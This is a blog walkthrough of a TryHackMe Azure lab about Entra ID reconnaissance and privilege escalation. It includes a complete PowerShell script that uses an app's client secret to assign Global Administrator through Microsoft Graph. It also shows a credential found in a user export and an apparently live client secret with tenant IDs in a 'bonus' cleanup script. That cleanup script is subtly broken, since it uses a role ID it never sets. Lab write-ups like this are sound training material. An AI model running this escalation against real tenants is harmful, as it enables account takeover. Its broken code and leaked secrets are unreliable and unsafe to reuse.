top of page
Search

Azure: Can you GA? TryHackMe Challenge Walkthrough

  • Writer: Aniket RT
    Aniket RT
  • 4 minutes ago
  • 7 min read

This challenge is part of Defending Azure learning path in TryHackMe. This challenge focuses on various tactics such as reconnaissance and privilege escalation.


As always, keep in mind the rules of engagement.


  • Do NOT create additional users

  • Do NOT modify existing users

  • Do NOT temper with this Azure tenant by any means

  • This is a shared training tenant and hence respect the integrity of the environment

  • Leave it as you found it


Without further ado, let's get started!


Hit the deploy lab button, navigate to portal.azure.com and copy paste the credentials that have been supplied.


Task 2: Entra ID


Once logged in, navigate to Microsoft Entra ID from the main search bar. This was formerly known as Azure Active Directory.



On the overview page, copy paste the tenant id to get the answer to Question 1 "What is theTenant ID?"




Question 2: What is the  Primary Domain?


On the same page, you will find the primary domain as well just below the tenant id.





Question 3: How many App Registrations are there in this tenant?


Answer is on the same page, right next to the Primary domain


Question 4: What is the user flag?


Now for this, navigate to Users on the left hand side.


Once here, Click on Download Users on the top



Now, on the right hand side popup give a name for your file and hit the Start Download button.



Now, click on the success notification on the bell icon.



Once here, click on download results.




Now, navigate to Downloads folder and open up this csv file.


You will find the flag on the second row itself under the office location for Kenneth as can be seen below.



Task 3: Roles and Administrators


Here, we have just one question and its very easy.


Navigate to Entra ID from the search bar and then from the left hand side select Roles and Administrators.



Once here, you will find Application Administrator on the second row.


Click on the number 1 and you will get your answer!





Task 4: Applications


Now, if we go back to Entra ID and Roles and Administrators from the left hand side, we will find a very interesting role namely Privileged Role Administrator. Clicking on the number 1 on this row gives us the answer to the first question.





Coming to the next question, the answer is simple! Again, Privileged Role Administrator can be abused to elevate privileges.


Task 5: Attack Path


This section is still like reconnaissance so lets wear our thinking hats and get to work.


Question 1: Which user (display name) is the obvious candidate, i.e., target user, for a Global Administrator?


If we go back to Entra ID and then click on Roles and Administrators on the left hand side; we can sort according to assignments and here, we come across another interesting role that is "Application Administrator"!


This role can manage all aspects of app registrations and enterprise applications hence, this seems to be the perfect candidate for privilege escalation. Click on 1 and you will get your answer!






Question 2: What's the role assignment for this user?


Application Administrator


Question 3: Which application is the obvious candidate, i.e. target app, to abuse for privilege escalation?


Go back to Entra Id then on the left hand side click on Roles and Administrators and look for Privileged Role Administrator and click on the 1 button.




Question 4: What's the role assignment for this application?


Privileged Role Administrator


Task 7: Client Secret


Question 2: There are many ways to generate a new secret. When using a PowerShell script to do it, you will need to create an object. Which object did you have to use to create a new client secret?


Answer: PSCredential


Task 9: Priv Esc Target User to GA!

Now, that we have all the details. All we need is a script to elevate our privilege's but before that we need something to authenticate as the target application.


As our temporary user has no administrator roles, we wont be able to generate a client secret for the target application hence we target a privileged user namely Kenneth.


Lets' go back to the earlier downloaded file that contains user's details. We need to find a way to login as the Application Administration (Kenneth) and the password is somewhere here in this csv file.


Focus on the office location column and you will find your answer as can be seen from below image.




Now you have Kenneth email and his password so navigate to portal.azure.com and login as



Once you have logged in successfully, navigate to Entra ID and then click on App Registrations on the left hand side. Select Owned Applications tab and select the first application. This is our target app as was previously identified.



Click on the application and navigate to Certificates and Secrets on the left hand side. Once here, click on "New Client Secret". Give a name for the secret and leave the default time period at 180 days.




Important:

Once you click on Save, make sure you copy the Value for example to Notepad as it will only be visible once.


Now, its time for the magic to take place and you are the magician!


You can install the following modules in Windows PowerShell:


Run PowerShell as Administrator: 

Install-Module Microsoft.Graph -Scope CurrentUser -AllowClobber

If you face SSL or policy errors, you can try:

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

Once the modules have been installed, run Windows PowerShell ISE as administrator and you can use the following script to elevate privileges to Global Admin.


I have pre-filled the application details here however if it changes, make sure you update the same in the parameters at the beginning of the script. Replace the existing client secret with the value that was copied earlier and targetUserPricipalName of your temporary user. This is the same user that you have used to login to the lab.


Note- Do not use Kenneth user to get to Global Admin privileges although that can be achieved as well using the following script.


# Define the application details
$clientId = "7c2f965c-3cb4-4e19-b843-7c756271d852"
$tenantId = "7acbf440-195e-4242-aa5c-dbac278eadf6"
$clientSecret = "xxx"
# Define the target user to be elevated
$targetUserPrincipalName = "xxx@970781.onmicrosoft.com"
# Define the role to be assigned (Global Administrator)
$roleName = "Global Administrator"  # Correct role name for the Global Administrator
# Step 1: Get the Access Token
$body = @{
    grant_type    = "client_credentials"
    client_id     = $clientId
    client_secret = $clientSecret
    scope         = "https://graph.microsoft.com/.default"
}
# Define the token URL
$tokenUrl = "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token"
# Make the HTTP request to get the access token
$response = Invoke-RestMethod -Uri $tokenUrl -Method Post -ContentType "application/x-www-form-urlencoded" -Body $body
# Extract the access token from the response
$accessToken = $response.access_token
# Output the access token to the console for verification (optional)
Write-Host "Access Token: $accessToken"
# Step 2: Get the Global Administrator (Company Administrator) role ID
$uri = "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"
$roles = Invoke-RestMethod -Uri $uri -Headers @{ 'Authorization' = "Bearer $accessToken" } -Method Get
# Debug output to check available roles
Write-Host "Roles available: "
$roles.value | ForEach-Object { Write-Host $_.displayName }
# Find the "Global Administrator" role
$globalAdminRole = $roles.value | Where-Object { $_.displayName -eq $roleName }
# Step 3: Get the target user ID
$userUri = "https://graph.microsoft.com/v1.0/users/$targetUserPrincipalName"
$user = Invoke-RestMethod -Uri $userUri -Headers @{ 'Authorization' = "Bearer $accessToken" } -Method Get
# Debug output to check user details
Write-Host "User details: "
Write-Host $user.id
# Step 4: Assign the Global Administrator role to the user
if ($globalAdminRole -ne $null) {
    Write-Host "Assigning the Global Administrator role to user: $targetUserPrincipalName"
    # Role Assignment API URL
    $assignRoleUri = "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
    # Prepare the body to assign the role
    $roleAssignmentBody = @{
        principalId       = $user.id
        roleDefinitionId  = $globalAdminRole.id
        directoryScopeId = "/"  # Correct scope ID for directory-level roles
    } | ConvertTo-Json
    try {
        # Make the role assignment request
        $response = Invoke-RestMethod -Uri $assignRoleUri -Headers @{ 'Authorization' = "Bearer $accessToken" } `
            -Method Post -Body $roleAssignmentBody -ContentType "application/json"
        Write-Host "Global Administrator role has been assigned to user $targetUserPrincipalName."
    } catch {
        Write-Host "Failed to assign Global Administrator role. Error: $_"
    }
} else {
    Write-Host "Global Administrator role is not available."
}

Output of the Script:



Now, you can verify the same by going back to Entra Id -> Roles and Administrators on the left hand side and you will find that you are now a GA! Target Achieved!



Now, lets find our flag quickly before our account gets locked out!


Navigate to Entra ID and then click on Audit Logs on the left hand side (Monitoring Section).


Once here, click on Download and select JSON as the file format.




Once you have downloaded the json file, you will find that this one specific application is appearing multiple times namely thmMultiTenantApp


Now, we are getting closer to capturing that final flag!


Let's go back to Entra ID and then select Enterprise Applications on the left hand side.


Click on the application thmMultiTenantApp and once open click on Properties from the left hand side.


Under Notes, you will find the final flag and that's it!


BONUS


Incase if you have used Kenneth User to privilege to Global Admin role then you can use the following PowerShell script to remove the Global Admin role from Kenneth user.


# ========= CONFIGURE THESE =========
$clientId = "7c2f965c-3cb4-4e19-b843-7c756271d852"
$tenantId = "7acbf440-195e-4242-aa5c-dbac278eadf6"
$clientSecret = "rOu8Q~BoRBWswpUcCDezUXHh0.3IwGWVQZh_xbWk"
$scope = "https://graph.microsoft.com/.default"
$userPrincipalName = "kennethallen@970781.onmicrosoft.com"
# ===================================
# Get token
$body = @{
    client_id     = $clientId
    scope         = "https://graph.microsoft.com/.default"
    client_secret = $clientSecret
    grant_type    = "client_credentials"
}
$tokenResponse = Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" -Body $body
$accessToken = $tokenResponse.access_token
# Get user ID
$user = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/users/$userPrincipalName" -Headers @{ Authorization = "Bearer $accessToken" }
$userId = $user.id
Write-Host "User ID: $userId"
# Get list of activated directory roles
$roles = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/directoryRoles" -Headers @{ Authorization = "Bearer $accessToken" }
$globalAdminRole = $roles.value | Where-Object { $_.displayName -eq "Global Administrator" }
if (-not $globalAdminRole) {
    Write-Host "Global Administrator role is not currently activated." -ForegroundColor Yellow
    return
}
Write-Host "Global Admin Role ID: $roleId"
# Remove the user from Global Admin role
$removeUri = "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/$userId/`$ref"
try {
    Invoke-RestMethod -Uri $removeUri -Method Delete -Headers @{ Authorization = "Bearer $accessToken" }
    Write-Host "`n✅ Successfully removed Global Administrator role from user: $userPrincipalName" -ForegroundColor Green
} catch {
    Write-Host "`n❌ Failed to remove Global Admin role: $($_.Exception.Message)" -ForegroundColor Red
}

Script Output





Comments

Microsoft Sentinel Blog

aniket18292@gmail.com

©2024 by Microsoft Sentinel Blog. Proudly created with Wix.com

bottom of page